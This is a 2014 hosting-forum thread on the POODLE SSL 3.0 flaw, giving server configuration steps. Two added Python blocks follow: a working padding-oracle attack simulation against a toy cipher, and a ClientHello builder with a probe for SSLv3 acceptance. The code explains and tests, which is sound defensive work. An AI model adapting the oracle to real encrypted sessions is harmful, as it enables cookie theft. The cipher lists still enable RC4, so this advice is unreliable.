amuck-landowner

Early rumors of a nasty vuln in SSL 3.0

rds100

If the problem is really SSLv3 related, you could disable it. Goodbye IE6.

splitice

Perhaps the best approach would be to throw a forbidden error if a modern client (client != IE6) attempts to use SSL 3.0. I am tempted to try and write this in Lua.

Some SSL is better than no SSL, and IE6 supports at most SSL 3.0.

From what I understand the extent of the vulnerability is that plaintext can be decrypted under specific attacks where a connection interruption is crafted and the browser retries with SSL 3.0. With this in mind, the browser might be a better place for the patch.
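A worked simulation of the padding oracle behind the attack splitice describes above, added here as an example; it is not code from any post in this thread. It assumes a 4-round Feistel block cipher in place of AES and HMAC-SHA1 in place of the SSL 3.0 MAC (constructed stand-ins so it runs on the Python standard library alone), a constructed request and session keys, and an attacker in the middle who re-triggers the same request (as injected JavaScript would) and only observes whether the server accepts the record. The SSL 3.0 receiver reads just the padding-length byte; the TLS 1.0 receiver (`strict_padding=True`) checks every filler byte, which is why the same attack fails there:

```python
import hashlib
import hmac
import os

BLOCK = 16    # block size of the toy cipher, the same as AES
MAC_LEN = 20  # SSL 3.0 SHA-1 suites append a 20-byte MAC


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel network over 16-byte blocks: a constructed stand-in for AES
    # so the example runs on the standard library. POODLE only relies on CBC chaining.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def cbc(key: bytes, iv: bytes, data: bytes, encrypt: bool) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        if encrypt:
            prev = block_encrypt(key, _xor(blk, prev))
            out.append(prev)
        else:
            out.append(_xor(block_decrypt(key, blk), prev))
            prev = blk
    return b"".join(out)


def seal_record(enc_key: bytes, mac_key: bytes, plaintext: bytes, rng=os.urandom):
    """SSL 3.0 style MAC-then-pad-then-encrypt (HMAC-SHA1 stands in for the
    SSL 3.0 MAC). The padding filler bytes are arbitrary; only the final
    length byte is defined, which is exactly what POODLE exploits."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK       # filler bytes before the length byte
    iv = rng(BLOCK)
    return iv, cbc(enc_key, iv, body + rng(pad_len) + bytes([pad_len]), True)


def open_record(enc_key, mac_key, iv, ct, strict_padding=False):
    """Return the plaintext, or None when the record is rejected.
    strict_padding=False is the SSL 3.0 check (only the length byte is read);
    strict_padding=True is the TLS 1.0 rule (every filler byte must equal pad_len)."""
    if not ct or len(ct) % BLOCK:
        return None
    data = cbc(enc_key, iv, ct, False)
    pad_len = data[-1]
    if pad_len >= BLOCK or len(data) < pad_len + 1 + MAC_LEN:
        return None
    if strict_padding and any(b != pad_len for b in data[-1 - pad_len:-1]):
        return None
    body = data[:-1 - pad_len]
    msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, msg, hashlib.sha1).digest()):
        return None
    return msg


def poodle_recover_byte(send, accepts, target_block, max_tries=60000):
    """Recover the last plaintext byte of ciphertext block `target_block`
    (1-based). send() returns a fresh (iv, ct) encryption of the same request,
    as a browser re-issuing it does; accepts(iv, ct) is the server's
    accept/reject signal as seen by the man-in-the-middle."""
    for _ in range(max_tries):
        iv, ct = send()
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        n = len(blocks) - 1                              # index of the all-padding last block
        forged = blocks[1:n] + [blocks[target_block]]    # overwrite the padding block with C_t
        if accepts(iv, b"".join(forged)):
            # Accepted (about 1 in 256) only when D(C_t) xor C_{n-1} ends in 0x0F,
            # hence P_t[-1] = 0x0F xor C_{t-1}[-1] xor C_{n-1}[-1].
            return (BLOCK - 1) ^ blocks[target_block - 1][-1] ^ blocks[n - 1][-1]
    return None


# Constructed request: the 16-byte cookie fills plaintext block 3 exactly, and the
# 8-byte body makes the padding a whole block, the alignment a real attacker gets
# by choosing the request path and body length from injected JavaScript.
REQUEST = (b"GET /aaaa HTTP/1.1\r\nCookie: sid=" + b"S3cr3tC00k13Val!"
           + b"\r\n\r\n" + b"x" * 8)
assert (len(REQUEST) + MAC_LEN) % BLOCK == 0


def run_attack(strict_padding=False, max_tries=60000):
    """Recover REQUEST[47] (the last cookie byte) through the accept/reject oracle."""
    enc_key, mac_key = os.urandom(16), os.urandom(20)   # constructed session keys

    def send():
        return seal_record(enc_key, mac_key, REQUEST)

    def accepts(iv, ct):
        return open_record(enc_key, mac_key, iv, ct, strict_padding) is not None

    return poodle_recover_byte(send, accepts, target_block=3, max_tries=max_tries)
```

`run_attack()` needs roughly 256 re-sent requests per recovered byte; the attacker then lengthens the request path by one byte so the next cookie byte becomes the last byte of a block and repeats. `run_attack(strict_padding=True)` returns None because a forged block passes the TLS 1.0 padding check with probability around 2^-120, which is why disabling SSL 3.0 (rather than patching the browser) removes the oracle.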

eva2000

Well, OpenSSL 1.0.1j has been released with TLS_FALLBACK_SCSV support: https://www.openssl.org/news/secadv_20141015.txt

Already updated Centmin Mod stack with OpenSSL 1.0.1j :)

Then again, for some of my sites IE <7 only accounts for 0.0032% of all browser sessions, so I can disable SSLv3, which it already has.

[attached image: ga_xp_browserstats_00.png]

Enterprisevpssolutions

How to resolve the SSL 3 exploit on cPanel

On October 14, 2014, security experts alerted the general public to a flaw in an obsolete but still used SSL protocol (SSL3). The protocol is more than 15 years old but is still supported by modern web browsers and servers.

The "POODLE" (Padding Oracle On Downgraded Legacy Encryption) attack can force a connection to "fall back" to SSL 3.0, where it is then possible to steal cookies, which are small data files that enable persistent access to an online service. If stolen, a cookie could allow an attacker access to someone's web-based email account, for example.

It's important to know that this flaw is most likely present in all servers and has nothing to do with the cPanel software. However, servers that currently function only because of SSL 3.0 fallback should be updated.

To accomplish this, please follow these steps. This does not appear to affect SSH and FTP services.

====

For Apache:

1) Go to WHM => Service Configuration => Apache Configuration => Include Editor => Pre Main Include
2) Select a version or All Versions
3) Add the following in the text box that appears:

SSLHonorCipherOrder On
SSLProtocol -All +TLSv1 +TLSv1.1 +TLSv1.2

4) Press the Update button and rebuild your Apache configuration.

This will disable SSLv3.0 on your server running Apache.

For LiteSpeed:

LiteSpeed has released an update to version 4.2.17. You can force a reinstall by running this:

# /usr/local/lsws/admin/misc/lsup.sh -f -v 4.2.17

1) Go to WHM => Service Configuration => Apache Configuration => Include Editor => Pre Main Include
2) Select a version or All Versions
3) Add the following in the text box that appears:

SSLHonorCipherOrder On
SSLProtocol -All +TLSv1 +TLSv1.1 +TLSv1.2

4) Press the Update button and rebuild your Apache configuration.

This will disable SSLv3.0 on your server running LiteSpeed.

====

For cpsrvd:

1) Go to WHM => Service Configuration => cPanel Web Services Configuration
2) Change the TLS/SSL Cipher List to:

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

For Dovecot/Courier:

1) Go to WHM => Service Configuration => Mailserver Configuration
2) Change the SSL Cipher List to:

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

For Exim:

1) Go to WHM => Service Configuration => Exim Configuration Manager => Advanced Editor
2) Change the following in tls_require_ciphers:

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

Please note that for cpsrvd, Dovecot/Courier, and Exim above, the suggested cipher lists do NOT disable all SSLv3 support; they disable the ciphers which use CBC, so some SSLv3 support is still available.

It is possible to completely disable SSLv3 support on these service ports with the following cipher list:

ALL:!ADH:+HIGH:+MEDIUM:-LOW:-SSLv2:-SSLv3:-EXP

Completely disabling SSLv3 ciphers on the above service ports greatly limits browser compatibility and prevents connections from all but a few modern browsers such as Google Chrome.
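An added example, not code from any post in this thread, covering both the TLS_FALLBACK_SCSV mechanism eva2000 mentions (OpenSSL 1.0.1j) and a way to check the SSLv3 changes described in the post above. It builds a real wire-format ClientHello, runs it through a constructed toy server that negotiates on version only (SCSV handling modelled on RFC 7507, a zeroed server random, and an assumed protocol_version alert for a version the server no longer speaks; real servers may send handshake_failure or just close the socket), and classifies the first record a server returns. `probe()` is the only function that touches the network and is not exercised offline:

```python
import os
import socket
import struct

SSL3, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303
NAMES = {SSL3: "SSLv3", TLS10: "TLSv1.0", TLS11: "TLSv1.1", TLS12: "TLSv1.2"}
TLS_FALLBACK_SCSV = 0x5600                 # RFC 7507 signalling cipher suite value
# Real suite IDs (AES128-SHA, AES256-SHA, DES-CBC3-SHA, RC4-SHA); the toy server
# below negotiates on version only and always answers with the first one.
SUITES = [0x002F, 0x0035, 0x000A, 0x0005]
HANDSHAKE_FAILURE, PROTOCOL_VERSION, INAPPROPRIATE_FALLBACK = 40, 70, 86


def build_client_hello(version, suites=SUITES, fallback=False, rng=os.urandom):
    """Wire-format ClientHello record. A client that retries at a lower version
    because an earlier handshake failed appends TLS_FALLBACK_SCSV to its suites."""
    ids = list(suites) + ([TLS_FALLBACK_SCSV] if fallback else [])
    suite_bytes = b"".join(struct.pack(">H", s) for s in ids)
    body = (struct.pack(">H", version) + rng(32) + b"\x00"      # version, random, empty session id
            + struct.pack(">H", len(suite_bytes)) + suite_bytes
            + b"\x01\x00")                                       # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body    # HandshakeType client_hello
    return b"\x16" + struct.pack(">HH", version, len(handshake)) + handshake


def parse_client_hello(record):
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    body = record[9:]
    version = struct.unpack(">H", body[:2])[0]
    p = 35 + body[34]                                            # skip random and session id
    n = struct.unpack(">H", body[p:p + 2])[0]
    suites = [struct.unpack(">H", body[i:i + 2])[0] for i in range(p + 2, p + 2 + n, 2)]
    return version, suites


def alert_record(description):
    return b"\x15" + struct.pack(">HH", TLS10, 2) + bytes([2, description])   # level 2 = fatal


def server_hello_record(version):
    # Zeroed server random and no session id: enough for the classifier, not a real hello.
    body = struct.pack(">H", version) + bytes(32) + b"\x00" + struct.pack(">H", SUITES[0]) + b"\x00"
    handshake = b"\x02" + len(body).to_bytes(3, "big") + body
    return b"\x16" + struct.pack(">HH", version, len(handshake)) + handshake


def server_respond(record, min_version, max_version, honor_scsv=True):
    """Toy server-side version negotiation. honor_scsv=True models OpenSSL 1.0.1j+;
    a server with SSLv3 disabled has min_version=TLS10. The protocol_version alert
    for a too-low version is an assumption of this example."""
    version, suites = parse_client_hello(record)
    if honor_scsv and TLS_FALLBACK_SCSV in suites and version < max_version:
        return alert_record(INAPPROPRIATE_FALLBACK)     # client is downgrading; we can do better
    if version < min_version:
        return alert_record(PROTOCOL_VERSION)
    return server_hello_record(min(version, max_version))


def classify(response):
    """Interpret the first record a server sends back to a probe."""
    if not response:
        return "closed"
    if response[0] == 0x15 and len(response) >= 7:
        return "alert:%d" % response[6]
    if response[0] == 0x16 and len(response) >= 11 and response[5] == 0x02:
        return "accepted:" + NAMES.get(struct.unpack(">H", response[9:11])[0], "unknown")
    return "unknown"


def forced_fallback(server_min, server_max, honor_scsv):
    """Attacker drops every handshake above SSLv3 until the client retries with
    SSLv3; being a retry, that ClientHello carries TLS_FALLBACK_SCSV."""
    hello = build_client_hello(SSL3, fallback=True)
    return classify(server_respond(hello, server_min, server_max, honor_scsv))


def probe(host, port=443, version=SSL3, timeout=5.0):
    """Send one real ClientHello at `version` and classify the reply. Nothing past
    the first server record is processed, so no keys or certificates are involved."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello(version))
        try:
            return classify(sock.recv(4096))
        except socket.timeout:
            return "timeout"
```

`forced_fallback(SSL3, TLS12, honor_scsv=True)` yields an inappropriate_fallback alert (86): the server can do TLS 1.2, sees the SCSV, and refuses the downgrade even though it still speaks SSLv3. Without SCSV support the same server answers `accepted:SSLv3`, which is the state POODLE needs; with SSLv3 disabled it refuses regardless of SCSV. A genuine fallback to an old server whose best is TLS 1.0 is still accepted, so SCSV breaks nothing legitimate. `probe(host, port)` at `version=SSL3` tests the protocol version independently of any cipher string, so after the Apache/LiteSpeed change above it should return anything but `accepted:SSLv3`, and run against the cpsrvd or implicit-TLS mail ports it shows whether the cipher-list-only change left SSLv3 reachable there.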